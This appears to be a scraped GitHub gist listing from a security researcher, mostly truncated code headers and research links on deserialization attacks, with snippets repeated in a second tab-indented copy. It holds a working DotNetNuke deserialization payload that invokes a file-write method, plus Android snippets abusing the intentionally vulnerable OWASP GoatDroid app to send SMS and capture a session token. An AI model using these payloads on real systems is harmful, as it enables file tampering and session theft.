Alvaro Muñoz pwntester

## HelloResource.java
package org.pwntester.jaxrs_jdbc;

import com.fasterxml.jackson.annotation.JsonProperty;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.jdbc.core.JdbcTemplate;
import org.springframework.jdbc.core.RowCallbackHandler;

import javax.ws.rs.*;
import javax.ws.rs.core.MediaType;
import java.sql.ResultSet;

## lgtm.js
// ==UserScript==
// @name         LGTM stars
// @namespace    http://tampermonkey.net/
// @version      0.1
// @description  Show star counts
// @author       Alvaro Muñoz (@pwntester)
// @match        https://lgtm.com/query/*
// @grant        none
// @run-at       document-idle
// ==/UserScript==

## ssti.ql
/**
 * @name SSTI
 * @kind path-problem
 * @id java/ssti
 */

import java
import semmle.code.java.dataflow.TaintTracking
import semmle.code.java.dataflow.FlowSources
import DataFlow

## README.md

      
              1 file
            
          
              1 fork
            
          
              0 comments
            
          
              1 star
            
          
                pwntester
                / README.md
            
            
              Last active
              February 25, 2020 21:13
            
              
                YSoSerial.NET references
              
          
    Research:

https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf
https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_Slides.pdf
https://googleprojectzero.blogspot.com.es/2017/04/exploiting-net-managed-dcom.html
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/december/beware-of-deserialisation-in-.net-methods-and-classes-code-execution-via-paste/
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/march/finding-and-exploiting-.net-remoting-over-http-using-deserialisation/
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/august/aspnet-resource-files-resx-and-deserialisation-issues/
https://www.nccgroup.trust/uk/our-research/use-of-deserialisation-in-.net-framework-methods-and-classes/?research=Whitepapers
https://community.microfocus.com/t5/Security-Research-Blog/New-NET-deserialization-gadget-for-compact-payload-When-size/ba-p/1763282


## ReadFile.xml
<profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">C:/windows/win.ini</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>

## README.md

      
              1 file
            
          
              2 forks
            
          
              1 comment
            
          
              14 stars
            
          
                pwntester
                / README.md
            
            
              Last active
              April 19, 2022 11:51
            
              
                JRE8 RCE gadget
              
          
    Pure JRE 8 RCE Deserialization gadget

Based on Chris Frohoff and Wouter Coekaerts ideas:

https://gist.github.com/frohoff/24af7913611f8406eaf3
http://wouter.coekaerts.be/2015/annotationinvocationhandler

Full project (containing dependencies) can be found here:

https://github.com/pwntester/JRE8u20_RCE_Gadget


## keybase.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                pwntester
                / keybase.md
            
            
              Created
              October 1, 2014 12:52
            
          
    Keybase proof

I hereby claim:

I am pwntester on github.
I am pwntester (https://keybase.io/pwntester) on keybase.
I have a public key whose fingerprint is 4777 762E 3F49 932D 4CAD  5BFE CB38 D5E4 FEA7 40AB

To claim this, I am signing this object:

  
## c.java
		Intent broadcastIntent=new Intent();
		broadcastIntent.setAction("org.owasp.goatdroid.fourgoats.SOCIAL_SMS");
		broadcastIntent.putExtra("phoneNumber","0034666666666");
		broadcastIntent.putExtra("message","Hi");
		sendBroadcast(broadcastIntent)

## b.java
    @Override
    public void onActivityResult(int requestCode, int resultCode, Intent data) {
      super.onActivityResult(requestCode, resultCode, data);
      switch(requestCode) {
        case (STATIC_INTEGER_VALUE) : {
          if (resultCode == Activity.RESULT_OK) {
        	  Log.w("alvms", "4Goats SessionToken: " + data.getStringExtra("sessionToken"));

          }
          break;

## a.java
        Intent tokenIntent = new Intent();
        tokenIntent.setComponent(new ComponentName("org.owasp.goatdroid.fourgoats","org.owasp.goatdroid.fourgoats.activities.SocialAPIAuthentication"));
        startActivityForResult(tokenIntent, STATIC_INTEGER_VALUE);
	package org.pwntester.jaxrs_jdbc;

	import com.fasterxml.jackson.annotation.JsonProperty;
	import org.springframework.beans.factory.annotation.Autowired;
	import org.springframework.jdbc.core.JdbcTemplate;
	import org.springframework.jdbc.core.RowCallbackHandler;

	import javax.ws.rs.*;
	import javax.ws.rs.core.MediaType;
	import java.sql.ResultSet;
	// ==UserScript==
	// @name LGTM stars
	// @namespace http://tampermonkey.net/
	// @version 0.1
	// @description Show star counts
	// @author Alvaro Muñoz (@pwntester)
	// @match https://lgtm.com/query/*
	// @grant none
	// @run-at document-idle
	// ==/UserScript==
	/**
	* @name SSTI
	* @kind path-problem
	* @id java/ssti
	*/

	import java
	import semmle.code.java.dataflow.TaintTracking
	import semmle.code.java.dataflow.FlowSources
	import DataFlow
	Intent broadcastIntent=new Intent();
	broadcastIntent.setAction("org.owasp.goatdroid.fourgoats.SOCIAL_SMS");
	broadcastIntent.putExtra("phoneNumber","0034666666666");
	broadcastIntent.putExtra("message","Hi");
	sendBroadcast(broadcastIntent)
	@Override
	public void onActivityResult(int requestCode, int resultCode, Intent data) {
	super.onActivityResult(requestCode, resultCode, data);
	switch(requestCode) {
	case (STATIC_INTEGER_VALUE) : {
	if (resultCode == Activity.RESULT_OK) {
	Log.w("alvms", "4Goats SessionToken: " + data.getStringExtra("sessionToken"));

	}
	break;
	Intent tokenIntent = new Intent();
	tokenIntent.setComponent(new ComponentName("org.owasp.goatdroid.fourgoats","org.owasp.goatdroid.fourgoats.activities.SocialAPIAuthentication"));
	startActivityForResult(tokenIntent, STATIC_INTEGER_VALUE);